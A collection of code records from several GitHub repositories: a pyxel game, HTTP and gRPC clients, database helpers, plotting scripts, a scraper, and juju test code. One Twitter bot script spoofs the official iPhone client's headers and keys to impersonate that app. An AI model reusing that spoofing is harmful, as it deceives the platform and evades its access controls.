pyxel.line(*figure2d[k], *figure2d[k + 4],self.color)\n\n\n\nclass Explosion:\n\n def __init__(self,x,y):\n self.posx,self.posy = x,y\n self.tick = 0\n self.full = random.choice((0,1))\n\n def update(self):\n self.tick += 0.5\n\n def draw(self):\n if self.full:\n pyxel.circ(self.posx,self.posy,self.tick,9+(int(self.tick)%2))\n else:\n pyxel.circb(self.posx,self.posy,self.tick,9+(int(self.tick)%2))\n\n\n\ndef triangle(x,y,angle,size,color):\n\n points = [\n [x + ((size/2) * math.cos(math.radians(angle))),y + ((size/2) * math.sin(math.radians(angle)))],\n [x + ((size/2) * math.cos(math.radians(angle + 120))),y + ((size/2) * math.sin(math.radians(angle + 120)))],\n [x + ((size/2) * math.cos(math.radians(angle + 240))),y + ((size/2) * math.sin(math.radians(angle + 240)))]\n ]\n\n pyxel.trib(*points[0],*points[1],*points[2],color)\n\n\ndef square(x,y,angle,size,color):\n\n points = [\n [x + (((size*math.sqrt(2))/2) * math.cos(math.radians(angle + 45))),y + (((size*math.sqrt(2))/2) * math.sin(math.radians(angle + 45)))],\n [x + (((size*math.sqrt(2))/2) * math.cos(math.radians(angle + 135))),y + (((size*math.sqrt(2))/2) * math.sin(math.radians(angle + 135)))],\n [x + (((size*math.sqrt(2))/2) * math.cos(math.radians(angle + 225))),y + (((size*math.sqrt(2))/2) * math.sin(math.radians(angle + 225)))],\n [x + (((size*math.sqrt(2))/2) * math.cos(math.radians(angle + 315))),y + (((size*math.sqrt(2))/2) * math.sin(math.radians(angle + 315)))]\n ]\n\n pyxel.line(*points[0],*points[1],color)\n pyxel.line(*points[1],*points[2],color)\n pyxel.line(*points[2],*points[3],color)\n pyxel.line(*points[3],*points[0],color)\n\n\ndef matrix_multiplication(a, b):\n columns_a = len(a[0])\n rows_a = len(a)\n columns_b = len(b[0])\n rows_b = len(b)\n\n result_matrix = [[j for j in range(columns_b)] for i in range(rows_a)]\n if columns_a == rows_b:\n for x in range(rows_a):\n for y in range(columns_b):\n sum = 0\n for k in range(columns_a):\n sum += a[x][k] * b[k][y]\n result_matrix[x][y] = sum\n return result_matrix\n\n else:\n return None\n\n\nGame()","repo_name":"Dornf58/ndcbulletnight","sub_path":"Bullet Night.py","file_name":"Bullet Night.py","file_ext":"py","file_size_in_byte":23295,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"37228202297","text":"import json\nimport requests\n\ns = requests.Session()\n\nr = s.get('http://httpbin.org/stream/20', stream = True)\n# print(r.text)\nprint(r.encoding)\n# print(r.json())\nif r.encoding is None:\n r.encoding = 'utf-8'\n\nfor line in r.iter_lines(decode_unicode=True): # 해당 iterater를 순회하면서 유니코드를 디코딩한다는 뜻\n # print(line) \n b = json.loads(line)\n for e in b.keys():\n print('key:', e, 'values :', b[e])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"seongjae6751/python_web_crawling_section3","sub_path":"3-2-3.py","file_name":"3-2-3.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"25554215687","text":"\nimport random\nimport logging\n\nimport grpc\n\nimport mail_pb2 as pb2\nimport mail_pb2_grpc as pb2_grpc\n\n\ndef run():\n with grpc.insecure_channel('localhost:50051') as channel:\n stub = pb2_grpc.SendServiceStub(channel)\n msg = pb2.Mail(content=\"send it\",\n _from=pb2.Person(name=\"hulk\", age=33, weight=84),\n _to=[pb2.Person(name=\"bulk\", age=10, weight=40),\n pb2.Person(name=\"you\", age=20, weight=50)])\n res = stub.SendMessage(msg)\n print(res.content)\n \nif __name__ == 
'__main__':\n logging.basicConfig()\n run()\n","repo_name":"Hulk89/python_tutorial","sub_path":"grpc_tut/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1001283723","text":"from sqlalchemy import Column, BIGINT, Integer, Float, String, Date, \\\n ForeignKey\nfrom sqlalchemy.orm import backref, relationship \nfrom model.database import Model\n\n\nclass Network(Model):\n __tablename__ = \"network\"\n id = Column(\"id\", Integer, primary_key = True)\n postcode = Column(\"postcode\", String(20))\n avg_download = Column(\"avg_download\", String(20))\n avg_upload = Column(\"avg_upload\", String(20))\n\n def __init__(self, postcode = None, avg_download = None, avg_upload = None, id = None):\n self.id = id\n self.postcode = postcode\n self.avg_download = avg_download\n self.avg_upload = avg_upload","repo_name":"rico3017/opendata","sub_path":"model/Network.py","file_name":"Network.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12170201466","text":"# Classification (U)\n\n\"\"\"Program: elastic_libs.py\n\n Description: A library program that contains a number of modules for\n general Elasticsearch database use.\n\n Functions:\n get_latest_dump\n list_dumps\n list_repos2\n\n\"\"\"\n\n# Libraries and Global Variables\n\n# Standard\n\n# Local\nimport version\n\n__version__ = version.__version__\n\n\ndef get_latest_dump(dump_list):\n\n \"\"\"Function: get_latest_dump\n\n Description: Return latest dump from a list of dumps based on epoch date.\n\n Arguments:\n (input) dump_list -> List of dumps from a repository.\n (output) Name of latest dump.\n\n \"\"\"\n\n dump_list = list(dump_list)\n last_dump = None\n\n if dump_list:\n search = max([item[4] for item in dump_list])\n\n for item in dump_list:\n if item[4] == search:\n last_dump = item[0]\n break\n\n return last_dump\n\n\ndef list_dumps(dump_list):\n\n \"\"\"Function: list_dumps\n\n Description: Lists the dumps under the current repository.\n\n Arguments:\n (input) dump_list -> List of database dumps.\n\n \"\"\"\n\n dump_list = list(dump_list)\n\n print(\"{0:45} {1:15} {2:10} {3:10} {4:10} {5:5} {6:5}\"\n .format(\"Database Dump Name\", \"Status\", \"Time\", \"Number\",\n \"Shard Information\", \"\", \"\"))\n print(\"{0:45} {1:15} {2:10} {3:10} {4:10} {5:5} {6:5}\"\n .format(\"\", \"\", \"\", \"Indexes\", \"Success\", \"Fail\", \"Total\"))\n\n for item in dump_list:\n print(\"{0:45} {1:15} {2:10} {3:10} {4:10} {5:5} {6:5}\"\n .format(item[0], item[1], item[6], item[7], item[8], item[9],\n item[10]))\n\n\ndef list_repos2(repo_list):\n\n \"\"\"Function: list_repos2\n\n Description: Lists the repositories in the Elasticsearch cluster.\n\n Arguments:\n (input) repo_list -> Dictionary of repositories.\n\n \"\"\"\n\n repo_list = dict(repo_list)\n\n print(\"{0:30} {1}\".format(\"Repository Name\", \"Location\"))\n\n for repo in repo_list:\n print(\"{0:30} {1}\".format(repo,\n repo_list[repo][\"settings\"][\"location\"]))\n","repo_name":"deepcoder42/elastic-lib","sub_path":"elastic_libs.py","file_name":"elastic_libs.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2987813835","text":"import uuid\n\nfrom sqlalchemy import (\n Column,\n ForeignKey,\n)\nfrom sqlalchemy.dialects.postgresql import (\n UUID,\n 
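# PostgreSQL-specific column types used below (UUID key, JSONB name payload)\n    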
JSONB,\n)\n\n\nfrom db.base_model import BaseModel\n\n\nclass FolderGroupNameModel(BaseModel):\n __tablename__ = \"folder_group_name\"\n name = Column(JSONB, nullable=False)\n folder_id = Column(UUID(as_uuid=True), ForeignKey(\"folder.id\"), nullable=False)\n","repo_name":"shardbread/home_challenge_clone","sub_path":"app/db/models/group_name.py","file_name":"group_name.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"35381990739","text":"from .sraping_yahoo import *\nfrom .get_dolar_price import *\n\ndef calc_lucro(acao, info_das_acoes):\n preco = 0\n ticket = list(acao.keys())[0]\n for x in info_das_acoes:\n if x['acao'] == ticket:\n preco = x['info'][0]['dados']['close']\n quantidade = acao[list((acao.keys()))[0]]['qtd']\n posicao = acao[list((acao.keys()))[0]]['pos']\n lucro = (preco * float(quantidade)) - float(posicao)\n #if acao[list((acao.keys()))[0]]['nacional'] == False:\n # lucro *= get_dolar_price()\n return round(lucro, 2)\n\ndef calculo_patrimonio(acao, lista_info, precos_da_carteira):\n patrimonio = 0\n for y in precos_da_carteira:\n if y['acao'] == acao:\n preco = y['info'][0]['dados']['close']\n patrimonio += float(lista_info[acao]['qtd']) * preco\n return round(patrimonio,2)\n\n\ndef calculo_de_volume(volume_medio,volume_diario,horario_comercial=7,inicio_expediente=10):\n hora_do_dia = int(datetime.now().strftime('%H'))\n minuto_do_dia = int(datetime.now().strftime('%M'))\n if minuto_do_dia > 45:\n hora_do_dia = hora_do_dia + 1\n tempo_de_expediente = hora_do_dia - inicio_expediente\n if 0 > tempo_de_expediente or tempo_de_expediente > horario_comercial:\n tempo_de_expediente = horario_comercial\n #se o dia for sabado ou domingo\n dia_de_hoje = datetime.today().weekday()\n if dia_de_hoje >= 5:\n tempo_de_expediente = horario_comercial\n volume_medio_por_hora = int(round(volume_medio / horario_comercial,0))\n volume_medio_do_dia = volume_medio_por_hora * tempo_de_expediente\n if volume_diario != 0:\n porcentagem_diferenca = round(((volume_diario / volume_medio_do_dia)-1) * 100,1)\n else:\n porcentagem_diferenca = 0\n dict_volume = {'volume':volume_diario,\n 'dados':{'avg_vol':volume_medio,\n 'high':'none',\n 'percent':porcentagem_diferenca}}\n\n if volume_diario > volume_medio_do_dia:\n dict_volume['dados']['high'] = True\n else:\n dict_volume['dados']['high'] = False\n return dict_volume\n\ndef correcao_carteira_com_peso(portfolio, patrimonio):\n patrimonio_total = patrimonio['patrimonio']['patrimonio_total']['pos']\n lista_retorno = []\n for x in portfolio:\n acao = list(x.keys())[0]\n if acao == 'caixa':\n posicao = round((float(x[acao]['pos']) / patrimonio_total * 100),1)\n x[acao]['peso'] = posicao\n if acao != 'caixa':\n if x[acao]['nacional'] == True:\n posicao = round((float(x[acao]['posicao_atual']) / patrimonio_total * 100),1)\n retorno_total = round((float(x[acao]['lucro']) / patrimonio_total) * 100,1) \n x[acao]['peso'] = posicao\n x[acao]['retorno_no_patrimonio'] = retorno_total\n else:\n posicao = round(((float(x[acao]['posicao_atual']) * get_dolar_price()) / patrimonio_total * 100),1)\n retorno_total = round((float(x[acao]['lucro']) / patrimonio_total * 100),1)\n x[acao]['peso'] = posicao\n x[acao]['retorno_no_patrimonio'] = retorno_total\n lista_retorno.append(x)\n return 
lista_retorno\n","repo_name":"ribeirosaimon/Planilha_Django","sub_path":"carteira/calculos/lucro.py","file_name":"lucro.py","file_ext":"py","file_size_in_byte":3239,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"38904206862","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as mtick\nimport csv\n\nrehash = []\ncount = []\npercent_count = [] # % of buckets rehashed to specific count\ncumulative = [] # number of buckets rehashed at each round\npercent_cumu = [] # % of buckets rehashed at round\n\nwith open('../csv/cert_rehash.csv') as file:\n    reader = csv.DictReader(file, delimiter=',')\n    for row in reader:\n        rehash.append(int(row['rehashes per bucket']))\n        count.append(int(row[' count']))\n\nprint(rehash)\n# rehash.pop(0)\n# count.pop(0)\nprint(count)\nprint(sum(count))\n\nfor i in range(0, len(count)):\n    c_sum = 0\n    percent_count.append(count[i] * 100 / sum(count))\n    if i == 0:\n        continue\n    for j in range(i, len(count)):\n        c_sum += count[j]\n    percent_cumu.append(c_sum * 100 / sum(count))\n    cumulative.append(c_sum)\n\nprint(percent_count)\nprint(cumulative)\npercent_cumu.insert(0, 0)\nprint(percent_cumu)\n\n# fig = plt.figure()\nfig, ax = plt.subplots()\n# rehash.pop(0)\nplt.bar(rehash, percent_cumu, color='y', label='cumulative')\nplt.bar(rehash, percent_count, label='specific count')\nplt.xlabel(\"Rehash Count\")\nplt.ylabel(\"Frequency out of Total Buckets\")\nplt.title(\"Bucket Rehashing Frequency Distribution\")\nax.yaxis.set_major_formatter(mtick.PercentFormatter())\nax.legend(loc=\"upper right\")\n\n\n\"\"\"\nax2 = ax.twinx()\nax2.bar(rehash, count)\nax2.set_ylabel(\"Frequency\")\n\n# xlocs, xlabs = plt.xticks()\nax.yaxis.set_major_formatter(mtick.PercentFormatter())\n\"\"\"\n\nplt.grid(True)\nplt.show()\nfig.savefig(\"../figures/cert_rehash.png\")\n\nexit()\n","repo_name":"mwong775/filters-project","sub_path":"scripts/cuckoo_old/fp_rehash.py","file_name":"fp_rehash.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"23633240891","text":"import numpy as np\nimport h5py\nfrom matplotlib import pyplot as plt\nimport matplotlib.patches as mpatches\nimport matplotlib.lines as mlines\nimport argparse\nfrom matplotlib import gridspec\n\n\nheights = np.arange(0, 15000)\n\ncloud_phases = [\n    'ice',\n    'mixed',\n    'water'\n]\n\nphase_colors = [\n    '#b0d5ff',\n    '#59aaff',\n    '#0075f3'\n]\n\nphase_linestyle = [\n    'dotted',\n    'dashdot',\n    'dashed'\n]\n\n\ndef plot_main(f):\n    h = len(heights)\n    total = f['cloud_incidence_total'][()]\n\n    left = np.zeros(h, dtype=np.double)\n    for i in reversed(range(len(cloud_phases))):\n        cloud_incidence_p = np.sum(\n            1.0*f['cloud_incidence_by_type_phase'][:, :, i],\n            axis=1\n        )/total\n        plt.fill_betweenx(\n            heights/1000.0,\n            left,\n            left + cloud_incidence_p*100.0,\n            facecolor=phase_colors[i],\n            lw=0,\n            edgecolor='#002254'\n        )\n        left += cloud_incidence_p*100.0\n\n    plt.xlabel('Frequency (%)')\n    plt.ylabel('Height (km)')\n    plt.xlim(0, 45)\n    plt.ylim(0, 15)\n    plt.xticks(plt.xticks()[0][:-1])\n\n    plt.grid()\n\n    legend = plt.legend(handles=[\n        mpatches.Patch(label=cloud_phases[i], facecolor=phase_colors[i], edgecolor='#002254', lw=0.5)\n        for i in range(len(cloud_phases))\n    ])\n    legend.get_frame().set_linewidth(0.8)\n\n\ndef plot_side(f):\n    total = f['cloud_incidence_total'][()]\n\n    for i in reversed(range(len(cloud_phases))):\n        cloud_incidence_p = np.sum(\n            
1.0*f['cloud_incidence_by_type_phase'][:, :, i],\n axis=1\n )/total\n plt.plot(\n cloud_incidence_p*100.0,\n heights/1000.0,\n color='#002254',\n linestyle=phase_linestyle[i],\n lw=1.5\n )\n\n plt.xlim(0, 35)\n plt.ylim(0, 15)\n plt.xlabel('Frequency (%)')\n plt.gca().yaxis.set_ticklabels([])\n plt.grid()\n\n legend = plt.legend(handles=\n [\n mlines.Line2D([], [], linestyle=phase_linestyle[i], label=cloud_phases[i], color='#002254', lw=1.5)\n for i in range(len(cloud_phases))\n ]\n )\n legend.get_frame().set_linewidth(0.8)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Plot cloud incidence by phase')\n parser.add_argument('file', type=str, help='HDF5 input file')\n parser.add_argument('-o', dest='outfile', type=str, help='output plot')\n parser.add_argument('-t', dest='title', type=str, help='plot title', default='')\n\n args = parser.parse_args()\n\n with h5py.File(args.file) as f:\n plt.rcParams['font.family'] = 'Open Sans'\n plt.suptitle(args.title, fontsize=14)\n\n gs = gridspec.GridSpec(1, 2, width_ratios=[3, 1])\n\n plt.subplot(gs[0])\n plot_main(f)\n plt.subplot(gs[1])\n plot_side(f)\n\n plt.subplots_adjust(wspace=0, left=0, right=1)\n plt.savefig(args.outfile, bbox_inches='tight')\n","repo_name":"peterkuma/clouds-ross-sea-2018","sub_path":"scripts/plot_cloud_incidence_by_phase.py","file_name":"plot_cloud_incidence_by_phase.py","file_ext":"py","file_size_in_byte":2960,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"10796698080","text":"import psycopg2\nimport config.config as dfc\n\nclass VideoTuple:\n#{\n insertproto = (\"INSERT INTO videos VALUES(DEFAULT, \"\n \"{}, '{}', '{}', {}, '{}', '{}', {})\")\n createsql = (\"\"\"CREATE TABLE videos (\n video_id SERIAL PRIMARY KEY,\n blk_id INTEGER NOT NULL,\n split VARCHAR(8) NOT NULL,\n vidname VARCHAR(32) NOT NULL,\n partition INTEGER NOT NULL,\n label VARCHAR(8) NOT NULL,\n origname VARCHAR(32),\n proc_flg BOOLEAN NOT NULL);\n CREATE INDEX ON videos (blk_id, split)\n \"\"\")\n\n def __init__(self, video_id=None, blk_id=None, split=None, vidname=None, \n partition=None, label=None, origname=None, preprocflg=False):\n #{\n self.video_id = video_id\n self.blk_id = blk_id\n self.split = split\n\n self.vidname = vidname\n self.partition = partition\n self.label = label\n self.origname = origname\n self.preprocflg = preprocflg\n #}\n\n def __repr__(self):\n return (f\"VideoTuple: {self.video_id}, {self.blk_id}, {self.split}, {self.vidname}, \"\n f\"{self.partition}, {self.label}, {self.origname}, {self.preprocflg}\")\n\n def insertsql(self): \n return VideoTuple.insertproto.format(\n self.blk_id, self.split, self.vidname, self.partition, \n self.label, self.origname, self.preprocflg)\n#}\n\nclass EpochTuple:\n#{\n insertproto = \"INSERT INTO epoch_queue VALUES(DEFAULT, {}, '{}', '{}')\"\n updateproto = (\"UPDATE epoch_queue SET status = '{}' WHERE epoch_id = {}\")\n haltsql = (\"SELECT COUNT(*) FROM epoch_queue WHERE status = 'HALT'\")\n createsql = (\"\"\" CREATE TABLE epoch_queue (\n epoch_id SERIAL PRIMARY KEY,\n blk_id INTEGER NOT NULL,\n split VARCHAR(8) NOT NULL,\n status VARCHAR(16) NOT NULL)\n \"\"\")\n\n def __init__(self, epoch_id=None, blk_id=None, split=None, status=None):\n self.epoch_id = epoch_id\n self.blk_id = blk_id\n self.split = split\n self.status = status\n\n def __repr__(self): \n return (f\"EpochTuple: {self.epoch_id}, {self.blk_id}, {self.split}, {self.status}\")\n\n def insertsql(self):\n return 
EpochTuple.insertproto.format(self.blk_id, self.split, self.status)\n\n def updatesql(self, status):\n return EpochTuple.updateproto.format(status, self.epoch_id)\n#}\n\nclass PostgreSqlHandle: \n#{\n def __init__(self, verbose=False): \n self._cursor = None\n self.dbconnection = None\n self.verbose = verbose\n \n def __enter__(self):\n #{\n self.dbconnection = None\n try:\n #{\n if self.verbose: print('Connecting to the PostgreSQL database...')\n self.dbconnection = psycopg2.connect(host=dfc.HOST, database=dfc.DATABASE,\n user=dfc.DBUSER, password=dfc.DBPASSWORD, port=dfc.DBPORT)\n \n # Validate connection\n self.cursor = self.dbconnection.cursor()\n self.cursor.execute('SELECT version()')\n version = self.cursor.fetchone()\n if self.verbose: print(f\"PostgreSQL version:\\n {version}\")\n #} \n except (Exception, psycopg2.DatabaseError) as error:\n print(\"PostgreSqlHandle::__enter__, ERROR:\", error)\n\n return self\n #}\n \n def __exit__(self, exception_type, exception_value, traceback):\n #{\n if self.cursor is not None:\n self.cursor.close(); self.cursor = None\n \n if self.dbconnection is not None:\n self.dbconnection.close(); self.dbconnection = None\n #}\n\n @property\n def cursor(self):\n if self._cursor is None and self.dbconnection is not None:\n self.cursor = self.dbconnection.cursor()\n return self._cursor\n\n @cursor.setter\n def cursor(self, value): \n self._cursor = value \n\n def sqlquery(self, sql, fetch=None):\n #{\n result = None\n try:\n self.cursor.execute(sql)\n if fetch == 'all': result = self.cursor.fetchall()\n elif fetch == 'one': result = self.cursor.fetchone()\n elif fetch is not None: result = self.cursor.fetchmany(fetch)\n self.dbconnection.commit()\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"PostgreSqlHandle::sqlquery, ERROR:\", error)\n\n return result\n #}\n\n def initialize_database(self):\n #{\n try:\n #{\n eexists = self.sqlquery(\"SELECT to_regclass('epoch_queue')\", fetch='one')[0] is not None\n vexists = self.sqlquery(\"SELECT to_regclass('videos')\", fetch='one')[0] is not None\n\n if eexists:\n count = self.sqlquery(\"SELECT COUNT(*) FROM epoch_queue\", fetch='one')[0]\n print(f\"WARNING: table 'epoch_queue' already exists with {count} rows.\")\n \n if vexists:\n count = self.sqlquery(\"SELECT COUNT(*) FROM videos\", fetch='one')[0]\n print(f\"WARNING: table 'videos' already exists with {count} rows.\")\n\n usrrsp = 'y'\n if eexists or vexists: usrrsp = input(f\"Are you sure you want reinitialize this database?\\n[N/y]\")\n if usrrsp.lower() != 'y': print(\"Database initialization operation aborted.\"); return False\n \n print(\"\\nCommencing database initialization...\")\n if vexists: self.cursor.execute(\"DROP TABLE videos\")\n if eexists: self.cursor.execute(\"DROP TABLE epoch_queue\")\n self.cursor.execute(EpochTuple.createsql)\n self.cursor.execute(VideoTuple.createsql)\n self.dbconnection.commit()\n print(\"Database initialization complete.\")\n #}\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"PostgreSqlHandle::initialize_database, ERROR:\", error)\n return False\n \n return True\n #}\n\n def populate_database(self, vtrains, vvalids):\n #{\n try:\n print(\"\\nCommencing database population...\")\n for vt in vtrains: self.cursor.execute(vt.insertsql())\n for vv in vvalids: self.cursor.execute(vv.insertsql())\n self.dbconnection.commit()\n print(\"Database population complete.\\n\")\n\n except (Exception, psycopg2.DatabaseError) as error:\n print(\"PostgreSqlHandle::populate_database, ERROR:\", error)\n 
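# usage sketch (assumption: train_rows/valid_rows are hypothetical lists\n            # of VideoTuple built elsewhere):\n            #   with PostgreSqlHandle(verbose=True) as db_handle:\n            #       if db_handle.initialize_database():\n            #           db_handle.populate_database(train_rows, valid_rows)\n            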
#}\n#}\n","repo_name":"ajdonich/deepfake-detector","sub_path":"deepfake/postgresdb.py","file_name":"postgresdb.py","file_ext":"py","file_size_in_byte":6636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"421699012","text":"import dump_load\nimport requests\nimport sys\n\n\nclass King(object):\n    # Set up the request headers, url and request parameters\n    def __init__(self,word):\n        self.url = 'http://fy.iciba.com/ajax.php?a=fy'\n        self.headers = {\n            \"User-Agent\": \"Mozilla / 5.0(Windows NT 10.0;WOW64) AppleWebKit \"\n                          \"/ 537.36(KHTML, likeGecko) Chrome / 65.0.3325.181Safari / 537.36\"\n        }\n        self.post_data = {\n            \"f\": \"auto\",\n            \"t\": \"auto\",\n            \"w\": word\n        }\n\n    # Send the request and fetch the data\n    def get_data(self):\n        res = requests.post(url=self.url,headers=self.headers,data=self.post_data)\n        return res.content.decode()\n\n    # Parse the data\n    def parse_data(self,data):\n        # Convert the JSON string into a Python dict\n        dict_data = dump_load.loads(data)\n        try:\n            result = dict_data['content']['out']\n        except:\n            result = dict_data['content']['word_mean']\n\n        print(type(dict_data))\n        print(result)\n\n    def run(self):\n        data = self.get_data()\n        self.parse_data(data)\n\nif __name__ == '__main__':\n    # word = input('What do you want to look up: ')\n    # a = King(word)\n    # print(type(a.get_data()))\n    # print(a.get_data())\n    # a.run()\n\n    # print(sys.argv)\n    word = sys.argv[1]\n    king = King(word)\n    king.run()","repo_name":"ioscarry/JXWY_PLUS","sub_path":"cidian/cidian.py","file_name":"cidian.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"17609779442","text":"# Interview question 21: reorder the array so that odd numbers precede even numbers\ndef reorder_odd_even(array):\n    if not array:\n        return\n    i = 0\n    j = len(array) - 1\n    while i < j:\n        if i < j and not isEven(array[i]):\n            i += 1\n        if i < j and isEven(array[j]):\n            j -= 1\n        tmp = array[i]\n        array[i] = array[j]\n        array[j] = tmp\n    return array\n\ndef isEven(n:int):\n    return (n & 1) == 0\n\nif __name__ == '__main__':\n    unorder_array = [1, 2, 3, 4, 5, 6, 7]\n    print(reorder_odd_even(unorder_array))","repo_name":"Real-Chen/Coding-Interviews","sub_path":"21_reorder_array.py","file_name":"21_reorder_array.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"33948651141","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nhtml = urlopen('http://www.gov.cn/')\nbs = BeautifulSoup(html.read(), 'html.parser')\ninfo = bs.findAll('div', {'class': 'column1'})\n\nfor i in info:\n    info_text = i.get_text()\n    print(info_text)\n","repo_name":"wangsc801/note","sub_path":"Python/crawler/bs4__find_by_class.py","file_name":"bs4__find_by_class.py","file_ext":"py","file_size_in_byte":263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"30091088915","text":"# Code inspired and based on @fourtonfish 's script\n# Code can be found here : https://gist.github.com/fourtonfish/5ac885e5e13e6ca33dca9f8c2ef1c46e\n\n# Importing libraries\nfrom twitter import *\nimport json\nimport rethinkdb as r\n\n# Importing modules\nfrom modules import handler\n\n# Guide on how to get your tokens\n# The IPHONE key and secret can be found here : https://gist.github.com/shobotch/5160017\n# These tokens have to be \"official\" tokens to spoof the oauth process.\n#\n# Then on how to get your personal access token and secret, you have to\n# use the PIN based authentication (https://dev.twitter.com/oauth/pin-based) with the 
IPHONE's\n# key and secret You can use : http://npmjs.com/package/twitter-pin-auth to do that\n# Then use the token and secret that you get from it by connecting with your \"bot\" account\n# Then store them in a .json file named credentials.json\n\n# Loads the credentials from a json file in order to use them in Oauth\nwith open('credentials.json') as config_credentials:\n CREDENTIALS = json.load(config_credentials)\n\n ACCESS_TOKEN = CREDENTIALS['ACCESS_TOKEN']\n ACCESS_TOKEN_SECRET = CREDENTIALS['ACCESS_TOKEN_SECRET']\n IPHONE_CONSUMER_KEY = CREDENTIALS['IPHONE_CONSUMER_KEY']\n IPHONE_CONSUMER_SECRET = CREDENTIALS['IPHONE_CONSUMER_SECRET']\n\n\n# Setting up connection to the database\n# https://www.rethinkdb.com/docs/guide/python/ for more informations\nwith open('config.json') as config_db:\n DB_CONFIG = json.load(config_db)\n\n PORT = DB_CONFIG['PORT']\n HOST = DB_CONFIG['HOST']\n\n r.connect(HOST, PORT).repl()\n\n\n# Spoofing requests to twitter\nclass SpoofOAuth(OAuth):\n def __init__(self, *args, **kwargs):\n OAuth.__init__(self, *args, **kwargs)\n\n def generate_headers(self):\n # note: the X-Twitter fields may not actually be necessary\n hdr = {\n 'User-Agent':\n 'Twitter-iPhone/6.45 iOS/9.0.2 (Apple;iPhone8,2;;;;;1)',\n 'X-Twitter-Client': 'Twitter-iPhone',\n 'X-Twitter-API-Version': '5',\n 'X-Twitter-Client-Language': 'en',\n 'X-Twitter-Client-Version': '6.45',\n }\n return hdr\n\n\n# Generating \"fake\" Oauth\nauth = SpoofOAuth(ACCESS_TOKEN, ACCESS_TOKEN_SECRET, IPHONE_CONSUMER_KEY, IPHONE_CONSUMER_SECRET)\n\n\n# Connecting to APIs\napi = Twitter(auth=auth)\ncaps_api = Twitter(domain='caps.twitter.com', api_version='v2', auth=auth)\n\n# Actual bot code situated in ./modules/handler.py\nhandler.cycle(api=api, caps_api=caps_api, r=r)\n","repo_name":"mdolr/legi-bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"21457663180","text":"\"\"\"Tests for assess_juju_sync_tools module.\"\"\"\n\nimport os\n\nfrom mock import (\n call,\n patch,\n )\nfrom assess_juju_sync_tools import (\n assert_file_version_matches_agent_version,\n verify_agent_tools,\n get_agent_version,\n parse_args,\n )\nfrom tests import (\n TestCase,\n )\nfrom utility import (\n JujuAssertionError,\n )\nfrom jujupy import (\n fake_juju_client,\n )\n\n\nclass TestParseArgs(TestCase):\n\n def test_common_args(self):\n args = parse_args([\"an-env\", \"/bin/juju\", \"/tmp/logs\", \"an-env-mod\"])\n self.assertEqual(\"an-env\", args.env)\n self.assertEqual(\"/bin/juju\", args.juju_bin)\n self.assertEqual(\"/tmp/logs\", args.logs)\n self.assertEqual(\"an-env-mod\", args.temp_env_name)\n self.assertEqual(False, args.debug)\n\n\nclass TestAssertFileVersionMatchesAgentVersion(TestCase):\n def test_assert_file_version_matches_agent_version_valid(self):\n for version in [(\"juju-2.0.1-xenial-amd64.tgz\", \"2.0.1\"),\n (\"juju-2.1-beta1-zesty-amd64.tgz\", \"2.1-beta1\"),\n (\"juju-2.0-rc2-arch-series.tgz\", \"2.0-rc2\"),\n (\"juju-2.0-xenial-amd64.tgz\", \"2.0\"),\n (\"juju-2.1-rc1-win10-amd64.tgz\", \"2.1-rc1\")]:\n assert_file_version_matches_agent_version(\n version[0], version[1])\n\n def test_raises_exception_when_versions_dont_match(self):\n for version in [(\"juju-2.0.1-xenial-amd64.tgz\", \"2.2.1\"),\n (\"juju-2.0-rc2-arch-series.tgz\", \"2.1\"),\n (\"juju-2.1-rc1-win10-amd64.tgz\", \"2.1-rc2\"),\n (\"juju-2.0-rc2-arch-series.tgz\", \"2.0\"),\n (\"juju-2.0-arch-series.tgz\", 
